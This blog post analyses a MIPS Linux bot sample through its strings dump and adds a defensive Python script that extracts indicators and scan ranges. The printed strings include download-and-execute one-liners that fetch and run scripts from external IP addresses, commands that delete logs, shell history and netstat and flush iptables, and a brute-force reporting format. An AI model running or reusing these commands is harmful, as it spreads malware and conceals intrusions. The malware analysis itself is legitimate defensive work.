Saturday, September 9, 2017

Analysis of recent Linux malware:

Today we received a Linux malware sample for analysis.
MD5: 26413FD652A4ABB3FCA4A936DE6A4736

remnux@remnux:~/Downloads$ file ntpd
ntpd: ELF 32-bit MSB  executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped

This sample appears to be an attacking bot. Let's look at the strings. The format strings below (for example 37.158.%d.%d) are address prefixes: the bot fills in the last two octets at runtime, so each one is a hardcoded /16 range it scans for targets:

00000001D6A0   00000001D6A0      0   37.158.%d.%d
00000001D6B0   00000001D6B0      0   95.9.%d.%d
00000001D6BC   00000001D6BC      0   41.252.%d.%d
00000001D6CC   00000001D6CC      0   58.71.%d.%d
00000001D6D8   00000001D6D8      0   104.55.%d.%d
00000001D6E8   00000001D6E8      0   78.186.%d.%d
00000001D6F8   00000001D6F8      0   78.189.%d.%d
00000001D708   00000001D708      0   221.120.%d.%d
00000001D718   00000001D718      0   88.5.%d.%d
00000001D724   00000001D724      0   41.254.%d.%d
00000001D734   00000001D734      0   103.20.%d.%d
00000001D744   00000001D744      0   103.47.%d.%d
00000001D754   00000001D754      0   103.57.%d.%d
00000001D764   00000001D764      0   45.117.%d.%d
00000001D774   00000001D774      0   101.51.%d.%d
00000001D784   00000001D784      0   137.59.%d.%d
00000001D794   00000001D794      0   1.56.%d.%d
00000001D7A0   00000001D7A0      0   1.188.%d.%d
00000001D7AC   00000001D7AC      0   14.204.%d.%d
00000001D7BC   00000001D7BC      0   27.0.%d.%d
00000001D7C8   00000001D7C8      0   27.8.%d.%d
00000001D7D4   00000001D7D4      0   27.50.%d.%d
00000001D7E0   00000001D7E0      0   27.54.%d.%d
00000001D7EC   00000001D7EC      0   27.98.%d.%d
00000001D7F8   00000001D7F8      0   27.112.%d.%d
00000001D808   00000001D808      0   27.192.%d.%d
00000001D818   00000001D818      0   36.32.%d.%d
00000001D824   00000001D824      0   36.248.%d.%d
00000001D834   00000001D834      0   39.64.%d.%d
00000001D840   00000001D840      0   42.4.%d.%d
00000001D84C   00000001D84C      0   42.48.%d.%d
00000001D858   00000001D858      0   42.52.%d.%d
00000001D864   00000001D864      0   42.56.%d.%d
00000001D870   00000001D870      0   42.63.%d.%d
00000001D87C   00000001D87C      0   42.84.%d.%d
00000001D888   00000001D888      0   42.176.%d.%d

Other interesting strings: brute-force success messages and a REPORT line, download-and-execute command lines fetching payloads from 89.38.96.67 and 94.177.172.221, process-name patterns (killed with pkill), cleanup commands that wipe logs, shell history and iptables rules, and a long list of User-Agent strings used in its HTTP requests:

00000001E289   00000001E289      0   [0;31mSuccessfully Bruteforced IP: 
00000001E2AD   00000001E2AD      0   [0;33m%s | 
00000001E2B9   00000001E2B9      0   [0;31mUsername: 
00000001E2CA   00000001E2CA      0   [0;33m%s | 
00000001E2D6   00000001E2D6      0   [0;31mPassword: 
00000001E2E7   00000001E2E7      0   [0;33m%s
00000001E2F4   00000001E2F4      0   REPORT %s:%s:%s
00000001E324   00000001E324      0   %s cd /var/; rm -rf tftp; wget http://89.38.96.67/tftp || tftp -r tftp -g 89.38.96.67; chmod 777 tftp; ./tftp; rm -rf tftp
00000001E3A8   00000001E3A8      0   cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.177.172.221/John.sh ; chmod 777 John.sh; sh John.sh; tftp 94.177.172.221 -c get tftp11.sh; chmod 777 tftp11.sh; sh tftp11.sh; tftp -r tftp22.sh -g 94.177.172.221; chmod 777 tftp22.sh; sh tftp22.sh; ftpget -v -u anonymous -p anonymous -P 21 94.177.172.221 ftp11.sh ftp11.sh; sh ftp11.sh; rm -rf John.sh tftp11.sh tftp22.sh ftp11.sh;rm -rf *;history -c
00000001E550   00000001E550      0   jackmy*
00000001E558   00000001E558      0   busybox*
00000001E574   00000001E574      0   tftp*
00000001E584   00000001E584      0   mipsel*
00000001E58C   00000001E58C      0   mips*
00000001E594   00000001E594      0   mips64*
00000001E59C   00000001E59C      0   i686*
00000001E5A4   00000001E5A4      0   sparc*
00000001E5BC   00000001E5BC      0   jackmeoff*
00000001E5C8   00000001E5C8      0   hackz*
00000001E5D0   00000001E5D0      0   bruv*
00000001E5E0   00000001E5E0      0   armv*
00000001E5E8   00000001E5E8      0   ntpd*
00000001E5F0   00000001E5F0      0   shitty*
00000001E5F8   00000001E5F8      0   jack*
00000001E618   00000001E618      0   mipsel
00000001E63C   00000001E63C      0   /dev/netslink/
00000001E64C   00000001E64C      0   /tmp/
00000001E654   00000001E654      0   /var/
00000001E65C   00000001E65C      0   /dev/
00000001E664   00000001E664      0   /var/run/
00000001E670   00000001E670      0   /dev/shm/
00000001E67C   00000001E67C      0   /mnt/
00000001E684   00000001E684      0   /boot/
00000001E68C   00000001E68C      0   /usr/
00000001E694   00000001E694      0   >%s.t && cd %s && for a in 
00000001E6B0   00000001E6B0      0   ls -a %s
00000001E6B9   00000001E6B9      0   ; do >$a; done; >retrieve ;echo ps aux >> proc ; pkill -9 %d
00000001E6F8   00000001E6F8      0   >%s.t && cd %s ; >retrieve
00000001E718   00000001E718      0   pkill -9 %s
00000001E728   00000001E728      0   rm -rf /tmp/* /var/* /var/run/* /var/tmp/*
00000001E754   00000001E754      0   rm -rf /var/log/wtmp
00000001E76C   00000001E76C      0   history -c;history -w
00000001E784   00000001E784      0   rm -rf /tmp/*
00000001E794   00000001E794      0   history -c
00000001E7A0   00000001E7A0      0   rm -rf ~/.bash_history
00000001E7B8   00000001E7B8      0   rm -rf /bin/netstat
00000001E7CC   00000001E7CC      0   history -w
00000001E7D8   00000001E7D8      0   pkill -9 busybox
00000001E7EC   00000001E7EC      0   pkill -9 perl
00000001E7FC   00000001E7FC      0   service iptables stop
00000001E814   00000001E814      0   /sbin/iptables -F;/sbin/iptables -X
00000001E838   00000001E838      0   close
00000001E840   00000001E840      0   keep-alive
00000001E84C   00000001E84C      0   accept
00000001E854   00000001E854      0   Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)
00000001E894   00000001E894      0   Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
00000001E8D4   00000001E8D4      0   Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10
00000001E964   00000001E964      0   Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0
00000001E99C   00000001E99C      0   Opera/6.04 (Windows XP; U) [en]
00000001E9BC   00000001E9BC      0   Opera/9.99 (X11; U; sk)
00000001E9D4   00000001E9D4      0   Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5
00000001EA2C   00000001EA2C      0   Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
00000001EACC   00000001EACC      0   Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk
00000001EB20   00000001EB20      0   Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41
00000001EB94   00000001EB94      0   Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)
00000001EBD4   00000001EBD4      0   Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
00000001EC8C   00000001EC8C      0   Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1
00000001ECE0   00000001ECE0      0   Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)
00000001ED38   00000001ED38      0   Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
00000001ED90   00000001ED90      0   Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
00000001EDD0   00000001EDD0      0   Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911
00000001EE18   00000001EE18      0   Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
00000001EE70   00000001EE70      0   Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)
00000001EEDC   00000001EEDC      0   Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
00000001EF34   00000001EF34      0   Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7
00000001EF84   00000001EF84      0   Mozilla/5.0 (PLAYSTATION 3; 3.55)
00000001EFA8   00000001EFA8      0   Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
00000001F004   00000001F004      0   wii libnup/1.0
00000001F014   00000001F014      0   Mozilla/4.0 (PSP (PlayStation Portable); 2.00)
00000001F044   00000001F044      0   PSP (PlayStation Portable); 2.00
00000001F068   00000001F068      0   Bunjalloo/0.7.6(Nintendo DS;U;en)
00000001F08C   00000001F08C      0   Doris/1.15 [en] (Symbian)
00000001F0A8   00000001F0A8      0   BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
00000001F0E8   00000001F0E8      0   BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100findlinks/2.0.1 (+http://wortschatz.uni-leipzig.de/findlinks/)
00000001F174   00000001F174      0   findlinks/1.1.6-beta6 (+http://wortschatz.uni-leipzig.de/findlinks/)
00000001F1BC   00000001F1BC      0   findlinks/1.1.6-beta4 (+http://wortschatz.uni-leipzig.de/findlinks/)
00000001F204   00000001F204      0   findlinks/1.1.6-beta1 (+http://wortschatz.uni-leipzig.de/findlinks/)
00000001F24C   00000001F24C      0   findlinks/1.1.5-beta7 (+http://wortschatz.uni-leipzig.de/findlinks/)
00000001F294   00000001F294      0   Mozilla/5.0 (Windows; U; WinNT; en; rv:1.0.2) Gecko/20030311 Beonex/0.8.2-stable
00000001F2E8   00000001F2E8      0   Mozilla/5.0 (Windows; U; WinNT; en; Preview) Gecko/20020603 Beonex/0.8-stable
00000001F338   00000001F338      0   Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2 (Debian-1.99+2.0b2+dfsg-1)
00000001F3A4   00000001F3A4      0   Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2
00000001F3F8   00000001F3F8      0   Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060826 BonEcho/2.0b2
00000001F454   00000001F454      0   Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1b2) Gecko/20060831 BonEcho/2.0b2
00000001F4B0   00000001F4B0      0   Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1b1) Gecko/20060601 BonEcho/2.0b1 (Ubuntu-edgy)
00000001F514   00000001F514      0   Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3
00000001F570   00000001F570      0   Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
00000001F5CC   00000001F5CC      0   Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
00000001F628   00000001F628      0   Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2
00000001F688   00000001F688      0   AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)
00000001F6D0   00000001F6D0      0   AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)
00000001F768   00000001F768      0   AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)
00000001F7B4   00000001F7B4      0   AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)
00000001F800   00000001F800      0   AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)
00000001F850   00000001F850      0   AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)
00000001F898   00000001F898      0   AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)
00000001F8EC   00000001F8EC      0   AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)
00000001F93C   00000001F93C      0   AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)
00000001F984   00000001F984      0   AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)
00000001F9D0   00000001F9D0      0   AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)
00000001FA1C   00000001FA1C      0   magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)
00000001FA64   00000001FA64      0   Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)
00000001FAB4   00000001FAB4      0   Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)
00000001FB04   00000001FB04      0   MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)
00000001FB38   00000001FB38      0   MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)
00000001FB6C   00000001FB6C      0   Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
00000001FBB4   00000001FBB4      0   %s %s HTTP/1.1
00000001FBC4   00000001FBC4      0   Connection: %s
00000001FBD4   00000001FBD4      0   Accept: */*
00000001FBE1   00000001FBE1      0   User-Agent: %s
00000001FBF4   00000001FBF4      0   arfgG
00000001FBFC   00000001FBFC      0   HBiug655
00000001FC08   00000001FC08      0   KJYDFyljf754
00000001FC18   00000001FC18      0   LIKUGilkut769458905
00000001FC2C   00000001FC2C      0   JHFDSkgfc5747694
00000001FC40   00000001FC40      0   GJjyur67458
00000001FC4C   00000001FC4C      0   RYSDk747586
00000001FC58   00000001FC58      0   HKJGi5r8675
00000001FC64   00000001FC64      0   KHGK7985i
00000001FC70   00000001FC70      0   yuituiILYF
00000001FC7C   00000001FC7C      0   GKJDghfcjkgd4
00000001FC8C   00000001FC8C      0   uygtfgtrevf
00000001FC98   00000001FC98      0   tyeuhygbtfvg
00000001FCA8   00000001FCA8      0   ewqdcftr
00000001FCB4   00000001FCB4      0   trbazetghhnbrty
00000001FCC4   00000001FCC4      0   tbhrwsehbg
00000001FCD0   00000001FCD0      0   twehgbferhb
00000001FCDC   00000001FCDC      0   etrbhhgetrb
00000001FCE8   00000001FCE8      0   edfverthbyrtb
00000001FCF8   00000001FCF8      0   kmiujmnhnhfgn
00000001FD08   00000001FD08      0   zcdbvgdfsbgfd
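The strings above are enough for a first triage even before disassembly. The following Python script is an added example, not code from the post or from the sample: it parses the four-column strings listing (offset, offset, flag, string; that column layout is an assumption from the dump shown), turns the "a.b.%d.%d" prefixes into /16 networks, pulls the payload hosts and URLs out of the wget/tftp/ftpget command lines, and tags the anti-forensics commands, User-Agent list and brute-force reporting strings. The embedded dump is a constructed excerpt of the lines shown in the post, so the script runs offline; the full dump would be fed in the same way. The in_scan_range check lets a defender test whether their own public address space falls inside the bot's hardcoded scan ranges.

```python
"""Triage a strings dump of the ntpd MIPS sample: extract IoCs and scan ranges."""
import re
import ipaddress

# Constructed excerpt of the strings dump shown in the post (offset, offset, flag, string).
SAMPLE_DUMP = """\
00000001D6A0   00000001D6A0      0   37.158.%d.%d
00000001D6B0   00000001D6B0      0   95.9.%d.%d
00000001D708   00000001D708      0   221.120.%d.%d
00000001E289   00000001E289      0   [0;31mSuccessfully Bruteforced IP: 
00000001E2F4   00000001E2F4      0   REPORT %s:%s:%s
00000001E324   00000001E324      0   %s cd /var/; rm -rf tftp; wget http://89.38.96.67/tftp || tftp -r tftp -g 89.38.96.67; chmod 777 tftp; ./tftp; rm -rf tftp
00000001E3A8   00000001E3A8      0   cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.177.172.221/John.sh ; chmod 777 John.sh; sh John.sh; tftp 94.177.172.221 -c get tftp11.sh
00000001E754   00000001E754      0   rm -rf /var/log/wtmp
00000001E76C   00000001E76C      0   history -c;history -w
00000001E7B8   00000001E7B8      0   rm -rf /bin/netstat
00000001E814   00000001E814      0   /sbin/iptables -F;/sbin/iptables -X
00000001E854   00000001E854      0   Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)
00000001E99C   00000001E99C      0   Opera/6.04 (Windows XP; U) [en]
00000001FBE1   00000001FBE1      0   User-Agent: %s
"""

# Assumed column layout of the dump: hex offset, hex offset, numeric flag, string.
LINE_RE = re.compile(r'^([0-9A-Fa-f]+)\s+[0-9A-Fa-f]+\s+\d+\s+(.*)$')
# "a.b.%d.%d": the bot fills the last two octets, so each prefix is a /16 scan range.
PREFIX_RE = re.compile(r'^(\d{1,3})\.(\d{1,3})\.%d\.%d$')
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
URL_RE = re.compile(r'https?://[^\s;|]+')
DOWNLOADERS = ('wget ', 'tftp ', 'ftpget ', 'curl ')
CLEANUP_MARKERS = ('history -c', 'history -w', 'rm -rf /var/log', 'rm -rf ~/.bash_history',
                   'rm -rf /bin/netstat', 'iptables -F', 'service iptables stop')
UA_PREFIXES = ('Mozilla/', 'Opera/')


def parse_dump(text):
    """Return (offset, string) pairs from the four-column strings listing."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            out.append((int(m.group(1), 16), m.group(2)))
    return out


def prefix_to_network(s):
    """'37.158.%d.%d' -> IPv4Network('37.158.0.0/16'); None if s is not a scan prefix."""
    m = PREFIX_RE.match(s)
    if not m:
        return None
    a, b = int(m.group(1)), int(m.group(2))
    if a > 255 or b > 255:
        return None
    return ipaddress.ip_network(f"{a}.{b}.0.0/16")


def triage(text):
    """Classify every string in the dump into defender-relevant buckets."""
    report = {
        "scan_networks": [], "payload_hosts": set(), "payload_urls": set(),
        "dropper_commands": [], "anti_forensics": [], "user_agents": [], "reporting": [],
    }
    for _offset, s in parse_dump(text):
        net = prefix_to_network(s)
        if net is not None:
            report["scan_networks"].append(net)
            continue
        if any(tool in s for tool in DOWNLOADERS):
            # Download-and-execute one-liners: the hosts/URLs are the distribution IoCs.
            report["dropper_commands"].append(s)
            report["payload_hosts"].update(IPV4_RE.findall(s))
            report["payload_urls"].update(URL_RE.findall(s))
        if any(mark in s for mark in CLEANUP_MARKERS):
            report["anti_forensics"].append(s)
        if s.startswith(UA_PREFIXES):
            report["user_agents"].append(s)
        if s.startswith('REPORT ') or 'Bruteforced' in s:
            report["reporting"].append(s)
    report["payload_hosts"] = sorted(report["payload_hosts"])
    report["payload_urls"] = sorted(report["payload_urls"])
    return report


def in_scan_range(ip, networks):
    """True if ip lies inside one of the bot's hardcoded /16 scan ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)


if __name__ == "__main__":
    result = triage(SAMPLE_DUMP)
    for key, value in result.items():
        print(f"{key}:")
        for item in value:
            print(f"  {item}")
    print("37.158.10.20 would be scanned:", in_scan_range("37.158.10.20", result["scan_networks"]))
```

Feeding the complete dump from the post instead of the excerpt gives the full list of /16 ranges, which can be matched against your own address space, and the payload hosts and URLs, which go straight into proxy and DNS blocklists; the anti-forensics bucket (wtmp deletion, history wiping, netstat removal, iptables flush) is a useful checklist of host artefacts to look for on a suspected infected device.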


26 comments:

Anonymous said...

Terrific post but I was wanting to know if you could write a little more on this
subject? I'd be very grateful if you could elaborate a little bit more.
Bless you!

newworld said...

Thanks for your comment.
Sure, we have started concentrating on Linux malware files nowadays.
Please watch this space and share this link with others.

by
newWorld
